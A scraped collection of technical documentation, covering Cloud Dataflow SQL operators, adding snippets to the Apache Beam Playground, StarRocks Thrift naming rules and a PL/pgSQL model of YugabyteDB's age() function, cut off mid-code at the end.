class=\"table-container-wrapper\"> {{< table >}} <table class=\"table-wrapper--equal-p\"> <thead> <tr> <th>Name</th> <th>Syntax</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>Logical NOT</td> <td nowrap>NOT X</td> <td>Returns FALSE if input is TRUE. Returns TRUE if input is FALSE. Returns <code>NULL</code> otherwise.</td> </tr> <tr> <td>Logical AND</td> <td nowrap>X AND Y</td> <td>Returns FALSE if at least one input is FALSE. Returns TRUE if both X and Y are TRUE. Returns <code>NULL</code> otherwise.</td> </tr> <tr> <td>Logical OR</td> <td nowrap>X OR Y</td> <td>Returns FALSE if both X and Y are FALSE. Returns TRUE if at least one input is TRUE. Returns <code>NULL</code> otherwise.</td> </tr> </tbody> </table> {{< /table >}} </div> Comparisons always return BOOL. Comparisons generally require both operands to be of the same type. If operands are of different types, and if Cloud Dataflow SQL can convert the values of those types to a common type without loss of precision, Cloud Dataflow SQL will generally coerce them to that common type for the comparison; Cloud Dataflow SQL will generally , where present. Comparable data types are defined in . STRUCTs support only 4 comparison operators: equal (=), not equal (!= and <>), and IN. The following rules apply when comparing these data types: FLOAT64 : All comparisons with NaN return FALSE, except for `!=` and `<>`, which return TRUE. BOOL: FALSE is less than TRUE. STRING: Strings are compared codepoint-by-codepoint, which means that canonically equivalent strings are only guaranteed to compare as equal if they have been normalized" }, { "data": "`NULL`: The convention holds here: any operation with a `NULL` input returns `NULL`. <div class=\"table-container-wrapper\"> {{< table >}} <table class=\"table-wrapper--equal-p\"> <thead> <tr> <th>Name</th> <th>Syntax</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>Less Than</td> <td>X &lt; Y</td> <td>Returns TRUE if X is less than Y.</td> </tr> <tr> <td>Less Than or Equal To</td> <td>X &lt;= Y</td> <td>Returns TRUE if X is less than or equal to Y.</td> </tr> <tr> <td>Greater Than</td> <td>X &gt; Y</td> <td>Returns TRUE if X is greater than Y.</td> </tr> <tr> <td>Greater Than or Equal To</td> <td>X &gt;= Y</td> <td>Returns TRUE if X is greater than or equal to Y.</td> </tr> <tr> <td>Equal</td> <td>X = Y</td> <td>Returns TRUE if X is equal to Y.</td> </tr> <tr> <td>Not Equal</td> <td>X != Y<br>X &lt;&gt; Y</td> <td>Returns TRUE if X is not equal to Y.</td> </tr> <tr> <td>BETWEEN</td> <td>X [NOT] BETWEEN Y AND Z</td> <td>Returns TRUE if X is [not] within the range specified. The result of \"X BETWEEN Y AND Z\" is equivalent to \"Y &lt;= X AND X &lt;= Z\" but X is evaluated only once in the former.</td> </tr> <tr> <td>LIKE</td> <td>X [NOT] LIKE Y</td> <td>Checks if the STRING in the first operand X matches a pattern specified by the second operand Y. Expressions can contain these characters: <ul> <li>A percent sign \"%\" matches any number of characters or bytes</li> <li>An underscore \"_\" matches a single character or byte</li> <li>You can escape \"\\\", \"_\", or \"%\" using two backslashes. For example, <code> \"\\\\%\"</code>. If you are using raw strings, only a single backslash is required. For example, <code>r\"\\%\"</code>.</li> </ul> </td> </tr> <tr> <td>IN</td> <td>Multiple - see below</td> <td>Returns FALSE if the right operand is empty. Returns <code>NULL</code> if the left operand is <code>NULL</code>. Returns TRUE or <code>NULL</code>, never FALSE, if the right operand contains <code>NULL</code>. Arguments on either side of IN are general expressions. Neither operand is required to be a literal, although using a literal on the right is most common. X is evaluated only once.</td> </tr> </tbody> </table> {{< /table >}} </div> When testing values that have a STRUCT data type for equality, it's possible that one or more fields are `NULL`. In such cases: If all non-NULL field values are equal, the comparison returns NULL. If any non-NULL field values are not equal, the comparison returns false. The following table demonstrates how STRUCT data types are compared when they have fields that are `NULL` valued. {{< table >}} <table class=\"table-wrapper--equal-p\"> <thead> <tr> <th>Struct1</th> <th>Struct2</th> <th>Struct1 = Struct2</th> </tr> </thead> <tbody> <tr> <td><code>STRUCT(1, NULL)</code></td> <td><code>STRUCT(1, NULL)</code></td> <td><code>NULL</code></td> </tr> <tr> <td><code>STRUCT(1, NULL)</code></td> <td><code>STRUCT(2, NULL)</code></td> <td><code>FALSE</code></td> </tr> <tr> <td><code>STRUCT(1,2)</code></td> <td><code>STRUCT(1, NULL)</code></td> <td><code>NULL</code></td> </tr> </tbody> </table> {{< /table >}} IS operators return TRUE or FALSE for the condition they are testing. They never return `NULL`, even for `NULL` inputs. If NOT is present, the output BOOL value is inverted. <div class=\"table-container-wrapper\"> {{< table >}} <table class=\"table-wrapper--equal-p\"> <thead> <tr> <th>Function Syntax</th> <th>Input Data Type</th> <th>Result Data Type</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td><pre>X IS [NOT] NULL</pre></td> <td>Any value type</td> <td>BOOL</td> <td>Returns TRUE if the operand X evaluates to <code>NULL</code>, and returns FALSE otherwise.</td> </tr> <tr> <td><pre>X IS [NOT] TRUE</pre></td> <td>BOOL</td> <td>BOOL</td> <td>Returns TRUE if the BOOL operand evaluates to TRUE. Returns FALSE otherwise.</td> </tr> <tr> <td><pre>X IS [NOT] FALSE</pre></td> <td>BOOL</td> <td>BOOL</td> <td>Returns TRUE if the BOOL operand evaluates to FALSE. Returns FALSE otherwise.</td> </tr> </tbody> </table> {{< /table >}} </div>" } ]
{ "category": "App Definition and Development", "file_name": "load_your_code.md", "project_name": "Beam", "subcategory": "Streaming & Messaging" }
[ { "data": "<!-- Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --> Adding a new example, code snippet, or Tour of Beam learning unit into the Playground is a three-step process: Prepare a code snippet. Add the code snippet to Apache Beam and/or Playground. Create a link to view the code snippet in Playground or to embed in a website page. Playground sources and output presentation formats: This guide will walk through all steps. * * * + + * * * + + + * + * * * Playground runs example code snippets using Apache Beam Direct Runner and requires that a code snippet is a complete runnable code. Code snippets can use data sources to demonstrate transforms and concepts. Playground restricts code access to Internet for security reasons. Following are the recommend ways for code snippet's data sources and dependecies: | Source/Dependency | Notes | |-|--| | File | Store code snippet's data file in a GCS bucket in `apache-beam-testing` project. | | BigQuery | Create a BigQuery dataset/table in `apache-beam-testing` project. | | Python package | Python packages accessible by Playground are located in a and in . Add required packages to . Please submit pull request with changes to the container or contact | | GitHub repo | If your example clones or dependes on files in a GitHub repo, copy required files to a GCS bucket in `apache-beam-testing` project and use the GCS files. | Playground provides multiple features to help focus users on certain parts of the code. Playground automatically applies the following to all snippets: Folds a comment if a snippet starts with one. Folds imports. Playground supports Named Sections to tag code blocks and provide the following view options: Fold all blocks except tagged code blocks. This can be useful to help user focus on specific code blocks and features presented in a snippet. Hide all code except tagged code blocks. This can be useful to create runnable snippets illustrating specific concepts or transforms, and hide all non-essential code blocks. Such snippet can be embedded on a website to make examples in documentation and tutorials runnable. Make certain code parts read-only. This feature can be useful to create learning units where user modifications are desired only in certain parts of the" }, { "data": "Please see section for details how different view options can be used. If you do not need any of those view options, skip to the . Named Sections are defined with the following syntax: ``` // [START section_name] void method() { ... } // [END section_name] ``` Create a named section for each part of your code that you want the above features for. To learn more details about the syntax please see the that Playground uses. There are several types of code snippets in the Playground: Example a code snippet displayed in the Playground Examples Catalog. See . Unlisted Example the same as an example, but is not listed in the example dropdown and can only be accessed by direct linking. These are typically embedded on a website. See . learning unit. See . User-shared code snippets do not require a PR and should be used for code not displayed on Beam resources. See . GitHub or other HTTPS URL sources. See . See the how artifacts map to these sources. Playground Examples Catalog helps users discover example snippets and is the recommended way to add examples. Playground automatically scans, verifies and deploys example snippets from the directories listed below. Note: SCIO examples are stored in a separate repository. To add support for a new SCIO example, please refer to . Playground Java, Python, and Go examples are automatically picked from these predefined directories by the `playgroundexamplesci.yml` GitHub workflow after a PR is merged to Beam repo: `/examples` `/learning/katas` `/sdks`. Adding Scala example snippets automatically is not supported, and Scala example snippets can be added to the catalog manually. Playground relies on metadata comments block to identify and place an example into the database, which is required for an example to show in the Examples Catalog. See for an example. Playground automatically removes metadata comments block before storing the example in database, so the metadata is not visible to end users. The block is in the format of a YAML map: ```yaml beam-playground: name: \"\" description: \"\" pipeline_options: \"--name1 value1 --name2 value2\" context_line: 1 categories: \"Combiners\" \"Core Transforms\" tags: \"numbers\" \"count\" complexity: BASIC default_example: true url_notebook: \"https://colab.research.google.com/github/apache/beam/blob/master/examples/notebooks/documentation/transforms/python/elementwise/filter-py.ipynb\" multifile: true always_run: true datasets: CountWords: location: local format: avro emulators: type: kafka topic: id: dataset source_dataset: \"CountWords\" ``` For metadata reference, see the fields in the `Tag` class . The list of supported categories for an example is . To add a new category, submit a PR that adds a category to the . When it is merged, the new category can be used in an example. Each SDK must have a single default example. If there is none, the user will see an error in the app and a blank editor. If there are more than one, it is not defined which one will be selected. Examples which require Kafka server emulator need to include the `emulators` tag and provide `dataset` in the example's tag. You can refer to an example" }, { "data": "Add your dataset in either JSON or Avro format into the `playground/backend/datasets` path. Add the following elements to the example's metadata tag: ```YAML emulators: type: kafka topic: id: dataset sourcedataset: <datasetname> datasets: <dataset_name>: location: local format: json # or 'avro' ``` replace `<dataset_name>` with the name of your dataset file without the file name extension. Use the exact string `\"kafka_server:9092\"` as the server name in your code snippet. This string will be replaced by the actual host name and port automatically before the compilation step by Playground. Kafka emulator limitations: Playground Kafka emulator currently supports only Beam Java SDK. The exact string `\"kafka_server:9092\"` should be present in the code snippet; any other variation like `\"kafa_server\" + \":9092\"` will not work. Create and submit a PR with the code snippet into following the . Verify that all pre-commit tests are passing. Playground CI will verify and deploy the example to Playground Example Catalog when the PR is merged. The snippet will be assigned an ID. You can find it in the address bar of the browser when you select it in the dropdown. For example, in this URL: ``` https://play.beam.apache.org/?path=SDKJAVAMinimalWordCount&sdk=java ``` the ID is: `SDKJAVAMinimalWordCount`. You will need the snippet ID to embed the Playground with the snippet into a website page. Not all examples must be visible in the example dropdown. Some examples are best in the context of Apache Beam documentation. To embed them into the documentation, use unlisted examples. They work and are checked and cached the same way as the examples displayed in the Playground catalog. Proceed the same way as with except: Use the directory `/learning/beamdoc` Do not use the following attributes: `categories` `default_example` `tags` The ID of the snippet is a function of the SDK and the `name` attribute from its metadata: | SDK | ID | |--|--| | Go | SDKGOname | | Java | SDKJAVAname | | Python | SDKPYTHONname | \"Tour of Beam\" is a separate project that combines learning materials with runnable snippets and allows students to track their learning progress. It uses the Playground engine, and so its content is added in a similar way. A Tour of Beam unit consists of learning materials and an optional runnable snippet. See on how to add units and link snippets to them. Tour of Beam snippets are checked and cached the same way as Playground examples. Proceed the same way as with except: Use the directory `/learning/tour-of-beam/learning-content`. It is recommended to follow the directory hierarchy as described in . Do not use the following attributes: `categories` `default_example` `tags` The ID of the snippet is a function of the SDK and the `name` attribute from its metadata: | SDK | ID | |--|--| | Go | TBEXAMPLESSDKGOname | | Java | TBEXAMPLESSDKJAVAname | | Python | TBEXAMPLESSDKPYTHONname | For instance, for the Go the example `CSV` it is `TBEXAMPLESSDKGOCSV`. A code snippet can be saved to the Playground using \"Share my code\" button in the Playground: This is easy and" }, { "data": "It does not require any interaction with the Beam team. Share my code considerations: A user-shared snippet is immutable. If you edit the code and re-share, a new snippet and a new link will be generated. Playground automatically applies a 3-month retention policy to shared snippets that are not used. To request a deletion of a snippet, please send an email to with subject: [Playground] Delete a snippet. Playground does not cache output or graph for user-shared snippets. Playground does not verify user-shared snippets. Playground can load a snippet stored on an HTTPS server using the provided URL, including GitHub direct links to raw file content. This is as easy and fast as using Share my code button, but also allows you to modify a snippet after it is published without changing a link. Loading snippet from HTTPS URL considerations: Playground does not cache output or graph for HTTPS URL snippets. Playground does not verify HTTPS URL snippets. For Playground to be able to load the snippet over HTTPS, the HTTPS server needs to allow the access by sending the following header: ``` Access-Control-Allow-Origin: * ``` at least when requested with `*.beam.apache.org` as . This is related to Cross-Origin Resource Sharing (CORS), to read more about CORS please see . Many prefer to host code snippets in their GitHub repositories. GitHub is known to allow cross-origin access on direct links to raw file content. An example of loading a GitHub snippet: ``` https://play.beam.apache.org/?sdk=go&url=https://raw.githubusercontent.com/apache/beam-starter-go/main/main.go ``` The snippet can now be shown in the Playground. Choose any of the following ways. Open your snippet in the dropdown menu. Without changing it, click \"Share my code\". Copy the link. The link contains the `path` to your snippet in the database. It is in the following format: ``` https://play.beam.apache.org/?path=SDKJAVAMinimalWordCount&sdk=java ``` A special case is the default snippet for an SDK. It can be loaded by the following link: ``` https://play.beam.apache.org/?sdk=python&default=true ``` This way if another snippet is ever made default, the links you shared will lead to the new snippet. Link to an unlisted example can be constructed by providing your snippet ID and SDK in the following URL: ``` https://play.beam.apache.org/?path=<ID>&sdk=<SDK> ``` The ID of the snippet is a function of the SDK and the `name` attribute from its metadata: | SDK | ID | |--|--| | Go | SDKGOname | | Java | SDKJAVAname | | Python | SDKPYTHONname | Link to a snippet can be constructed by providing your snippet ID and SDK in the following URL: ``` https://play.beam.apache.org/?path=<ID>&sdk=<SDK> ``` The ID of the snippet is a function of the SDK and the `name` attribute from its metadata: | SDK | ID | |--|--| | Go | TBEXAMPLESSDKGOname | | Java | TBEXAMPLESSDKJAVAname | | Python | TBEXAMPLESSDKPYTHONname | For instance, for the Go the example `CSV` it is `TBEXAMPLESSDKGOCSV`, and the link is ``` https://play.beam.apache.org/?path=TBEXAMPLESSDKGOCSV&sdk=go ``` You get the link when you click \"Share my code\" button. It is in the following format: ```" }, { "data": "``` Add the URL to the `url` parameter, for example: ``` https://play.beam.apache.org/?sdk=go&url=https://raw.githubusercontent.com/apache/beam-starter-go/main/main.go ``` You can link to an empty editor to make your users start their snippets from scratch: ``` https://play.beam.apache.org/?sdk=go&empty=true ``` The above URLs load snippets that you want. But what happens if the user switches SDK? Normally this will be shown: The catalog default example for the new SDK. The empty editor for the new SDK if the Playground is embedded. This can be changed by linking to multiple examples, up to one per SDK. For this purpose, make a JSON array with any combination of parameters that are allowed for loading single examples, for instance: ```json [ { \"sdk\": \"java\", \"path\": \"SDKJAVAAggregationMax\" }, { \"sdk\": \"go\", \"url\": \"https://raw.githubusercontent.com/apache/beam-starter-go/main/main.go\" } ] ``` Then pass it in`examples` query parameter like this: `https://play.beam.apache.org/?sdk=go&examples=[{\"sdk\":\"java\",\"path\":\"SDKJAVAAggregationMax\"},{\"sdk\":\"go\",\"url\":\"https://raw.githubusercontent.com/apache/beam-starter-go/main/main.go\"}]` This starts with the Go example loaded from the URL. If SDK is then switched to Java, the `AggregationMax` catalog example is loaded for it. If SDK is switched to any other one, the default example for that SDK is loaded, because no override was provided. Embedded Playground is a simplified interface of the Playground web app designed to be embedded into an `<iframe>` in web pages. It supports most of the Playground web app features. The embedded Playground URLs start with `https://play.beam.apache.org/embedded` and use the same query string parameters as the Playground web app. Additionally, the Embedded playground supports `editable=0` parameter to make the editor read-only. Open your snippet in the dropdown menu. Without changing it, click \"Share my code\". Go to \"Embed\" tab. Copy the HTML code and add to your web page. Open your code by the link that you got when you shared it. Again click \"Share my code\". Go to \"Embed\" tab. Copy the HTML code and add to your web page. Follow the instructions to to your code. Optionally make the link to the Embedded Playground by replacing `play.beam.apache.org/?...` with `play.beam.apache.org/embedded?...` because the embedded interface is simpler. Insert this link into an `<iframe>` HTML element as follows: ```html <iframe src=\"https://play.beam.apache.org/embedded?sdk=go&url=https://raw.githubusercontent.com/apache/beam-starter-go/main/main.go\" width=\"90%\" height=\"600px\" allow=\"clipboard-write\" /> ``` Apache Beam website uses . Custom Hugo shortcodes were added to Apache Beam website to embed Playground snippets. Use the custom shortcodes to embed Playground into the Apache Beam website: `playground` shortcode, see for a complete example. `playground_snippet` shortcode, see for all supported options. These shortcodes generate an `iframe` with the URLs described above. If your code contains named sections as described in the , you can apply view options to those sections. Otherwise skip this. Add `readonly` parameter with comma-separated section names: `https://play.beam.apache.org/?sdk=go&url=...&readonly=section_name` Add `unfold` parameter with comma-separated section names: `https://play.beam.apache.org/?sdk=go&url=...&unfold=section_name` This folds all foldable blocks that do not overlap with any of the given sections. Add `show` parameter with a single section name: `https://play.beam.apache.org/?sdk=go&url=...&show=section_name` It is still the whole snippet that is sent for execution, although only the given section is visible. This also makes the editor read-only so the user cannot add code that conflicts with the hidden text." } ]
{ "category": "App Definition and Development", "file_name": "thrift-guides.md", "project_name": "StarRocks", "subcategory": "Database" }
[ { "data": "displayed_sidebar: \"English\" As the project involving, any fields may become optional. But if it is defined as required, it can not be removed. So `required` should not be used. To be back compatible, the ordinal of the field SHOULD NOT be changed. The names of messages are all lowercase, with underscores between words. Files should end in `.thrift`. ``` my_struct.thrift // Good MyStruct.thrift // Bad my_struct.proto // Bad ``` Struct names start with a capital letter `T` and have a capital letter for each new word, with no underscores: TMyStruct ``` struct TMyStruct; // Good struct MyStruct; // Bad struct TMy_Struct; // Bad struct TmyStruct; // Bad ``` The names of struct members are all lowercase, with underscores between words. ``` 1: optional i64 my_field; // Good 1: optional i64 myField; // Bad ```" } ]
{ "category": "App Definition and Development", "file_name": "age.md", "project_name": "YugabyteDB", "subcategory": "Database" }
[ { "data": "title: Function age() returns integer [YSQL] headerTitle: Function age() returns integer linkTitle: Function age() description: The semantics of \"function age() returns integer\". [YSQL] menu: v2.18: identifier: age parent: miscellaneous weight: 10 type: docs This section defines the semantics of the overload of the function age() with two parameters of data type plain timestamp by implementing the defining rules in PL/pgSQL in the function modeledage(). The rules by which the returned interval value is calculated are the same for the (timestamptz, timestamptz) overload as for the plain (timestamp, timestamp) overload except that, for the with time zone_ overload, the actual timezone component (whether this is specified implicitly or taken from the session environment) and the sensitivity to the reigning timezone have their usual effect. It turns out that to match the behaviour of the built-in age(timestamp, timestamp) function, modeledage(timestamp, timestamp) needs to map a \"borrowed\" month into a month-specific number of days. (The subsection on this page's parent page introduces the notion of \"borrowing\".) The function daysprmonth() implements the mapping. Because of the effect of leap years, the function needs both year and month_ parameters. Create the helper function thus: ```plpgsql drop function if exists daysprmonth(int, int) cascade; create function daysprmonth(year in int, month in int) returns int language plpgsql as $body$ begin -- Self-doc. The value of \"month\" comes from \"extract(month from ...)\". assert (month between 1 and 12), 'daysprmonth: assert failed'; declare m_next constant int not null := case month when 12 then 1 else month + 1 end; ynext constant int not null := case mnext when 1 then year + 1 else year end; begin -- February needs special treatment 'cos of leap year possibility. -- So may as well use the same method for all months. return makedate(ynext, mnext, 1) - makedate(year, month, 1); end; end; $body$; ``` You can test it with examples like this: ```plpgsql select daysprmonth(2011, 2) as \"Feb-2011\", daysprmonth(2012, 2) as \"Feb-2012\", daysprmonth(2013, 4) as \"Apr-2013\", daysprmonth(2016, 12) as \"Dec-2016\"; ``` This is the result: ```output Feb-2011 | Feb-2012 | Apr-2013 | Dec-2016 -+-+-+- 28 | 29 | 30 | 31 ``` Because the says nothing of value to describe the semantics that the function age(timestamp, timestamp) implements, the function modeledage(timestamp, timestamp)_ was developed to a large extent by trial and errorin other words, thorough testing with a huge set of input values was key. (See the subsections that describe the functions and below.) The implementation was made simpler by this intuitive, and trivially observable, realization: ```output age(t1, t2) == -age (t2, t1) ``` The following intuition (copied from this page's parent page) is key to the scheme: The function age() extracts the year, month, day, and seconds since midnight for each of the two input moment values. It then subtracts these values pairwise and uses them to create an interval value. But the statement of the semantics must be made more carefully than this to accommodate the fact that the outcomes of the pairwise differences might be negative. So the first step, done conveniently in the declare section, is to calculate the pairwise differences months, days, and secs navelyaccepting that the values might come out negative. However, because the input timestamp values are exchanged, if necessary, so that the local variable tdob (for date-of-birth) is less than or equal to the local variable ttoday., it's guaranteed that the navely computed value of the years pairwise difference cannot be negative. There is, though, a different quirk to accommodate in the years calculation: the year zero (as a matter of arbitrary, but universal, convention) simply does not" }, { "data": "This means that the years difference between 1 AD and 1 BC is just one. This explains the use of the case expression in the expression for years. The executable block statement (from begin through its matching end;) revisits the computation of each of secs, days, and months, in that order, by implementing \"borrowing\" from the immediately next coarser-grained difference value when the initially computed present value is negative. This is where the conversion from one \"borrowed\" month to a number of days must accommodate the number of days in the \"borrowed\" monthgiven not only which month it is but also, because of the possibility that this is February in a leap year, which year it is. This pinpoints a key question: Which is the \"borrowed\" month? Is it (a) the one with [yydob, mmdob]; or (b) the one with [yytoday, mmtoday]; or (c) maybe the month that precedes or follows either of these? Empirical testing shows that the \"borrowed\" month is given by choice (a). The candidate interval value to return is then evaluated (using the revised values) as: ```output make_interval(years=>years, months=>months, days=>days, secs=>secs); ``` The final step is simply to take account of whether the initial test showed that the input timestamp values should be exchanged. If there was no exchange, then the candidate interval value is returned \"as is\". But if the input timestamp values were exchanged, then the negated candidate interval value is returned. Create the function thus: ```plpgsql drop function if exists modeled_age(timestamp, timestamp) cascade; create function modeledage(ttodayin in timestamp, tdob_in in timestamp) returns interval language plpgsql as $body$ declare -- Exchange the inputs for negative age. negativeage constant boolean not null := (ttodayin - tdobin) < makeinterval(); ttoday constant timestamp not null := case negativeage when true then tdobin else ttodayin end; tdob constant timestamp not null := case negativeage when true then ttodayin else tdobin end; secsprday constant double precision not null := 246060; monspryear constant int not null := 12; yytoday constant int not null := extract(year from ttoday); mmtoday constant int not null := extract(month from ttoday); ddtoday constant int not null := extract(day from ttoday); sstoday constant double precision not null := extract(epoch from ttoday::time); yydob constant int not null := extract(year from tdob); mmdob constant int not null := extract(month from tdob); dddob constant int not null := extract(day from tdob); ssdob constant double precision not null := extract(epoch from tdob::time); years int not null := case -- Special treatment is needed when yytoday and yydob span AC/BC -- 'cos there's no year zero. when yytoday > 0 and yydob < 0 then yytoday - yydob - 1 else yytoday - yydob end; months int not null := mmtoday - mmdob; days int not null := ddtoday - dddob; secs double precision not null := sstoday - ssdob; begin if secs < 0 then secs := secs + secsprday; days := days - 1; end if; if days < 0 then days := days + daysprmonth(yydob, mmdob); months := months - 1; end if; if months < 0 then months := months + 12; years := years - 1; end if; declare age constant interval not null := make_interval(years=>years, months=>months, days=>days, secs=>secs); begin return case negative_age when true then -age else age end; end; end; $body$; ``` The design of this is straightforward. It evaluates both age() and modeledage() using the actual input timestamp values. Then it compares them for" }, { "data": "Notice that it's critical to use the user-defined \"strict equals\" operator, `==`, for a pair of interval_ values rather than the native equals for this argument pair. The section presents the code that creates the \"strict equals\" operator. The recommendation, given at the start of the section, is to download the '.zip' file to create the reusable code that supports the pedagogy of the overall date-time major section and then to execute the kit's \"one-click\" install script. The section explains why you must use the \"strict equals\" operator. The function returns a text value that starts with the text typecasts of the actual input timestamp values followed by the text typecast of the result given by the built-in age() function. Only if the function modeledagevsage() gives a result that is not strictly equal to the built-in age() function's result, is the modeled result appended to the returned text value. The idea here is to reduce the visual noise in the output to make it easy to spot when (at least while modeledage() was under development) the results from the built-in and the modeled functions disagree. Create the comparison function thus: ```plpgsql drop function if exists modeledagevs_age(timestamp, timestamp) cascade; create function modeledagevsage(ttoday in timestamp, t_dob in timestamp) returns text language plpgsql as $body$ declare input constant text not null := lpad(ttoday::text, 31)||' '||lpad(tdob::text, 31)||' '; m constant interval not null := modeledage(ttoday, t_dob); a constant interval not null := age(ttoday, tdob); begin return case (m == a) when true then input||lpad(a::text, 42) else input||lpad(a::text, 42)||' ! '||lpad(m::text, 42) end; end; $body$; ``` Now exercise the comparison function with a few manually composed input values. The results are easiest to read if you use a table function encapsulation: ```plpgsql drop function if exists manualtestreportformodeled_age() cascade; create function manualtestreportformodeled_age() returns table(z text) language plpgsql as $body$ begin z := lpad('ttoday', 31 )||' '||lpad('tdob', 31 )||' '||lpad('age()', 42 ); return next; z := lpad('-', 31, '-')||' '||lpad('-', 31, '-')||' '||lpad('-', 42, '-'); return next; -- Sanity test: zero age. z := modeledagevs_age('2019-12-21', '2019-12-21' ); return next; -- Positive ages. z := modeledagevs_age('2001-04-10', '1957-06-13' ); return next; z := modeledagevs_age('2001-04-10 11:19:17', '1957-06-13 15:31:42' ); return next; z := modeledagevs_age('0007-06-13 15:31:42.123456 BC', '2001-04-10 11:19:17.654321 BC'); return next; -- Negative age. z := modeledagevs_age('1957-06-13 15:31:42', '2001-04-10 11:19:17' ); return next; -- ttoday and tdob span the BC/AD transition. z := modeledagevs_age('0001-01-01 11:19:17', '0001-01-01 15:31:42 BC' ); return next; z := modeledagevs_age('0001-01-01 15:31:42 BC', '0001-01-01 11:19:17' ); return next; end; $body$; select z from manualtestreportformodeled_age(); ``` This is the result: ```output ttoday tdob age() - 2019-12-21 00:00:00 2019-12-21 00:00:00 00:00:00 2001-04-10 00:00:00 1957-06-13 00:00:00 43 years 9 mons 27 days 2001-04-10 11:19:17 1957-06-13 15:31:42 43 years 9 mons 26 days 19:47:35 0007-06-13 15:31:42.123456 BC 2001-04-10 11:19:17.654321 BC 1994 years 2 mons 3 days 04:12:24.469135 1957-06-13 15:31:42 2001-04-10 11:19:17 -43 years -9 mons -26 days -19:47:35 0001-01-01 11:19:17 0001-01-01 15:31:42 BC 11 mons 30 days 19:47:35 0001-01-01 15:31:42 BC 0001-01-01 11:19:17 -11 mons -30 days -19:47:35 ``` There is no fourth results columnin other words, the comparison of the result from the user-defined modeledagevsage(timestamp, timestamp) and the result from the built-in age()_ passes the test for each tested pair of inputs. Notice that the first two \"Positive ages\" tests use the same values as do the examples on this page's parent page in the section Because the implementation of modeledage(timestamp, timestamp) function was designed using intuition and iterative refinement in response to trial-and-error, it's critically important to test the comparison of the result from this and the result from the built-in age() function with a huge number of distinct input pairs. The only way to do this is to generate these pairs" }, { "data": "There is no available suitable random-number generator. But the function genrandombytes() comes to the rescue. This is not, strictly speaking, a built-in. Rather, it comes when you install the _ extension. {{< tip title=\"Always make the 'pgcrypto' extension centrally available in every database.\" >}} Not only does installing the extension bring the function genrandombytes(); also, it brings genrandomuuid(). This is commonly used to populate a surrogate primary key column. Yugabyte therefore recommends that you adopt the practice routinely to install pgcrypto (this must be done by a superuser) in a central \"utilities\" schema in every database that you create. By granting appropriate privileges and by including this schema in, for example, the second position in every regular user's search path, you can make genrandombytes(), genrandomuuid(), and all sorts of other useful utilities immediately available to all users with no further fuss. You might also like to install the extension as part of your standard set of central utilities. This does bring a random-number generator function, normalrand(). However, this generates a normally distributed set of double precision values. This functionality isn't appropriate for testing modeledage(); but it is appropriate for many other testing purposes. {{< /tip >}} First, you need a helper function to convert the bytea value that genrandombytes() returns to a number value. Create and test the helper thus: ```plpgsql drop function if exists byteatonum(bytea) cascade; create function byteatonum(b bytea) returns numeric language plpgsql as $body$ declare n numeric := 0; begin for j in 0..(length(b) - 1) loop n := n*256+get_byte(b, j); end loop; return n; end; $body$; ``` Now create the function randomtimestamp(). This invokes maketimestamp() with values from six successive invocations of genrandombytes(), using byteatonum() to convert the returned values first to numeric values and then to suitably constrained int values for each of the year, month, mday, hour, and min actual arguments and to a suitably constrained double precision value for the sec actual argument. Create it thus: ```plpgsql drop function if exists random_timestamp() cascade; create function random_timestamp() returns timestamp language plpgsql as $body$ declare year constant int not null := greatest(1::int, mod(byteatonum(genrandombytes(2))::int, 4700)); month constant int not null := greatest(1::int, mod(byteatonum(genrandombytes(2))::int, 12)); mday constant int not null := greatest(1::int, mod(byteatonum(genrandombytes(2))::int, 28)); hour constant int not null := mod(byteatonum(genrandombytes(2))::int, 23); min constant int not null := mod(byteatonum(genrandombytes(2))::int, 59); sec constant numeric not null := mod(byteatonum(genrandombytes(3)), 58.987654::numeric); ts constant timestamp not null := make_timestamp(year, month, mday, hour, min, sec::double precision); begin return case when (mod(byteatonum(genrandombytes(3))::int, 2) = 1) then ts else (ts::text||' BC')::timestamp end; end; $body$; ``` Test it like this: ```plpgsql select random_timestamp() as \"ts-1\", random_timestamp() as \"ts-2\"; ``` Repeat this select time and again. Each time, you'll see a pair of different values. Sometimes, they both have AD dates; sometimes they both have BC dates; sometimes one has an AD date and one has a BC date; sometimes \"ts-1\" is earlier than \"ts-2\"; and sometimes \"ts-2\" is earlier than \"ts-1\". The value 4700 was chosen to constrain the year because 4713 BC is the earliest legal timestamp value. (See the table in the subsection on the major sections' main page.) It's sufficient for the present testing purpose that the generated timestamp values are between 4700 BC and 4700 AD. This function invokes randomtimestamp() to generate two new distinct values and then uses these to invoke modeledage() and the built-in age(). It compares the values that they return using the `==` operator. Only if they differ, does it invoke modeledagevsage() to show the differing values. And if this happens, it notes that at least one difference has been" }, { "data": "The expectation is that there will be no differences to report so that the final report will show simply \"No failures\" and therefore be maximally easily understood. As a bonus, the report shows the minimum and the maximum generated values returned by randomtimestamp(). {{< note title=\"Notice how the special manifest constants '-infinity' and 'infinity' are used.\" >}} Notice how the '-infinity' and 'infinity' are used to set the starting values for, respectively, maxts and mints. Without this text-book pattern, the loop would need to be coded more elaborately by treating the first iteration as a special case that establishes maxts and mints as the values returned by the invocation of randomtimestamp() this time; only then could the second and subsequent iterations be coded using \"maxts := greatest(maxts, greatest(ts1, ts2));\" and \"mints := least(mints, least(ts1, ts2));\"_. {{< /note >}} Create the function thus: ```plpgsql drop function if exists randomtestreportformodeled_age(int) cascade; create function randomtestreportformodeledage(noof_attempts in int) returns table(z text) language plpgsql as $body$ declare no_failures boolean not null := true; max_ts timestamp not null := '-infinity'; min_ts timestamp not null := 'infinity'; begin for j in 1..noofattempts loop declare ts1 constant timestamp not null := random_timestamp(); ts2 constant timestamp not null := random_timestamp(); m constant interval not null := modeled_age(ts1, ts2); a constant interval not null := age(ts1, ts2); begin maxts := greatest(maxts, greatest(ts1, ts2)); mints := least(mints, least(ts1, ts2)); if m == a then null; else no_failures := false; z := modeledagevs_age(ts1, ts2); return next; end if; end; end loop; z := ''; return next; z := rpad('-', 120, '-'); return next; if no_failures then z := 'No failures.'; return next; end if; z := 'maxts: 